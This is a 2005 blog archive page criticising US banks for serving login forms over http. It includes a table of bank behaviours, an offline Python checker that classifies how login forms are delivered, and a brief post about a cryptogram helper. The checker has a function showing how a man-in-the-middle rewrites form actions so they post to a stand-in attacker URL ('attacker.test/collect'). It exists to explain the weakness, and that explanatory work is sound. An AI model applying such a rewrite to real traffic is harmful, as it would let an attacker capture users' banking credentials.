Archive for the 'Cryptography' Category

Banks and https

Saturday, May 28th, 2005

Here's what happens when you go to the web pages of some large US banks, and what happens when you try changing the homepage URL from "http" to "https" or vice versa.

Bank                 Homepage requested over http                            Homepage requested over https
Bank One             Insecure login form.                                    Works.
Wells Fargo          Insecure login form.                                    Works.
Wachovia             Insecure login form.                                    Works.
Bank of America      Insecure login form.                                    Redirects to http.
Washington Mutual    Insecure login form.                                    Redirects to http.
US Bank              Insecure login form.                                    Error: Connection closed.
Citibank             Link to secure login form at "web.da-us.citibank.com".  Error: 404.
HSBC                 Link to secure login form at "www.ebank.us.hsbc.com".   Certificate hostname mismatch.
Suntrust             Redirects to https.                                     Works.

("Insecure login form" means the login form is served over http and only submits to https.)

Most of these banks make Critical SSL/TLS Mistake #1: serving the login form over http and only submitting it to https. This protects against passive eavesdropping, but not against a man-in-the-middle. Because the http page is neither encrypted nor authenticated, an active attacker can rewrite it in transit so that the form posts to a server they control, or so that it captures keystrokes, and the user sees exactly the same page; the https submission only ever protects whatever destination the attacker chose. An attacker who can mount a passive attack can usually mount a man-in-the-middle attack with only a little more work, so these banks are barely more secure than sites that do not use https at all.

Of the banks that do serve https login forms, many make two smaller mistakes: their main page is http, which invites http links and bookmarks, and their login forms live on long hostnames like "web.da-us.citibank.com", which are harder for users to verify than e.g. "www.citibank.com" or "citibank.com".
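Here is a small checker, added as an example for this post rather than code from it, that applies the table's vocabulary to a page: it finds the forms that ask for a password, reports whether the page commits Mistake #1 (http page, https submit), lists the hostnames the forms post to (the long-hostname problem above), and shows what a man-in-the-middle does to the unauthenticated http page so that the submit no longer goes anywhere near the bank. The bank name, hostnames, attacker URL and HTML are all constructed; nothing is fetched from the network.

```python
"""Audit a bank login page the way the table above does.

Added example (not code from the original post). Standard library only;
all URLs and HTML are constructed, so it runs offline.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _FormFinder(HTMLParser):
    """Collect each <form> and whether it contains an <input type="password">."""

    def __init__(self):
        super().__init__()
        self.forms = []        # [{"action": str, "password": bool}, ...]
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form":
            self._current = {"action": a.get("action", ""), "password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if a.get("type", "").lower() == "password":
                self._current["password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def login_form_actions(page_url, html):
    """Absolute action URLs of every form on the page that asks for a password."""
    finder = _FormFinder()
    finder.feed(html)
    return [urljoin(page_url, f["action"]) for f in finder.forms if f["password"]]


def classify(page_url, html):
    """Verdict in the table's vocabulary: how the login form is delivered."""
    page_scheme = urlsplit(page_url).scheme
    actions = login_form_actions(page_url, html)
    if not actions:
        return "no login form"
    verdicts = []
    for action in actions:
        form_scheme = urlsplit(action).scheme
        if page_scheme == "https" and form_scheme == "https":
            verdicts.append("secure login form")
        elif page_scheme == "http" and form_scheme == "https":
            # Mistake #1: the credentials travel over TLS, but the form that
            # says where to send them arrived unauthenticated over http.
            verdicts.append("insecure login form")
        else:
            verdicts.append("plaintext login form")
    return "; ".join(verdicts)


def form_hosts(page_url, html):
    """Hostnames the login form(s) post to; these, not the page's, are what the user must verify."""
    return [urlsplit(a).hostname for a in login_form_actions(page_url, html)]


def mitm_rewrite(html, attacker_url):
    """What a man-in-the-middle does to the http page: repoint every https form
    action at a server they control. Nothing else changes, so the user sees the
    same login box, lock image and reassuring text; only the destination differs."""
    return re.sub(r'action="https://[^"]*"', 'action="%s"' % attacker_url, html)


# Constructed sample: an http homepage whose login form submits to https on a
# long hostname, the pattern the table reports for most of the banks.
SAMPLE_PAGE_URL = "http://www.example-bank.test/"
SAMPLE_HTML = """
<html><body>
<img src="lock.gif"> Your ID and passcode are encrypted before they leave your computer.
<form method="post" action="https://web.da-us.example-bank.test/signin">
  <input type="text" name="id">
  <input type="password" name="passcode">
  <input type="submit" value="Sign In">
</form>
</body></html>
"""

if __name__ == "__main__":
    print("as served:         ", classify(SAMPLE_PAGE_URL, SAMPLE_HTML), form_hosts(SAMPLE_PAGE_URL, SAMPLE_HTML))
    evil = mitm_rewrite(SAMPLE_HTML, "http://attacker.test/collect")
    print("after MITM rewrite:", classify(SAMPLE_PAGE_URL, evil), form_hosts(SAMPLE_PAGE_URL, evil))
    print("if page were https:", classify("https://www.example-bank.test/", SAMPLE_HTML))
```

The sample page is classified "insecure login form" as served, and "secure login form" only if the same HTML had itself come over https; after the attacker's rewrite the verdict drops to "plaintext login form" while the page text, lock image and SSL reassurance are untouched, which is exactly why the http-form-https-submit arrangement buys so little.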

Many of the largest targets for financial fraud in the US are only defending themselves against passive attacks. Do they believe authenticated encryption isn't important in the US? Aren't these the same banks that blackmailed Mozilla developers into adding two of its most-hated features, "autocomplete=off" and "Cache-Control: no-store", claiming that any browser without these features was not secure enough for use on their sites? Banks in the US are heavily regulated, so why aren't they mandated to use https correctly?

Users either don't look for the lock icon at all, or can be tricked by the combination of a lock image and a statement in the page like "The moment you click Sign In and before your ID and passcode leave your computer, we encrypt them using Secure Sockets Layer (SSL) technology." Why is that? What can be done? What should be done?

New JavaScript cryptogram helper

Thursday, January 13th, 2005

The first homework problem in my cryptography class was to break a cryptogram. After looking at the other cryptogram helpers on the web, I created the JavaScript Cryptogram Helper. It lets you paste cryptograms, highlights all instances of the selected letter in blue, and shows a table with letter frequencies to facilitate frequency analysis. The UI was inspired by Teppo Pihlajamäki's Flash cryptogram game.